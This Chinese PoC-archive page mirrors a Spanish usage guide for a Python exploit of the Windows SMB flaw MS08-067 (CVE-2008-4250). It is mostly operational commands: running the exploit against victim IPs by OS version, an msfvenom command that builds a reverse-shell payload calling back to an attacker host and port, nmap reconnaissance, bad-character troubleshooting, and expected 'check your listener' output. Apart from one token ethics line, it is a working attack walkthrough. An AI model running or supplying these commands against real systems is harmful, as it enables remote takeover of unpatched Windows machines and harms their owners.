关联漏洞
描述
MS08-067 | CVE-2008-4250
介绍
# Guía Completa de Uso: # Exploit MS08-067 Mejorado
## 📌 Uso Básico
```bash
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]
```
## 🎯 Ejemplos Prácticos
### 1. Windows XP SP0/SP1 (Puerto Default 445)
```bash
python3 Exploit_MS08-067.py 192.168.1.100 1
```
### 2. Windows 2003 SP1 English (Puerto 139)
```bash
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139
```
### 3. Con Shellcode Personalizado
```bash
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
```
## 🔍 Parámetros Obligatorios
| Parámetro | Descripción | Valores Válidos |
|--------------|--------------------------------------|-----------------|
| `IP_VÍCTIMA` | IP del objetivo | Cualquier IPv4 |
| `VERSIÓN_OS` | Versión del SO vulnerable | 1-7 (ver tabla) |
## 📋 Tabla de Versiones SOPORTADAS
| Valor | Sistema Operativo | Arquitectura |
|-------|----------------------------------|--------------|
| 1 | Windows XP SP0/SP1 Universal | x86 |
| 2 | Windows 2000 Universal | x86 |
| ... | ... | ... |
## ⚙️ Opciones Adicionales
| Opción | Descripción | Default |
|-----------------|------------------------------------------|---------|
| `-p/--port` | Puerto SMB (445/139) | 445 |
| `-t/--timeout` | Timeout en segundos | 5 |
| `-s/--shellcode`| Ruta a shellcode personalizado | None |
## 🛠️ Generación de Shellcode con msfvenom
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows
```
## 🔎 Identificación del Objetivo
```bash
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>
```
## 🚨 Solución de Problemas Comunes
### Error: `STATUS_OBJECT_NAME_NOT_FOUND`
1. Verifica si el servicio Browser está activo:
```bash
nmap -p 445 --script smb-enum-shares <IP>
```
2. Prueba con otro pipe (modifica el script):
```python
# Cambiar \\pipe\\browser por \\pipe\\srvsvc
```
### Shellcode no ejecuta
- Verifica caracteres prohibidos: `\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40`
- Usa este comando para validar:
```bash
msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
```
## 💡 Recomendaciones Éticas
✅ Usar solo en entornos autorizados
❌ Nunca en sistemas de producción sin permiso
## 📊 Salida Exitosa Esperada
```plaintext
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!
```
> ⚠️ **Nota**: Este exploit no funciona en sistemas parcheados con el boletín MS08-067.
文件快照
[4.0K] /data/pocs/d433192b1b6bd48ef0c77bf70a89a688659a807b
├── [ 12K] Exploit_MS08-067.py
└── [2.8K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。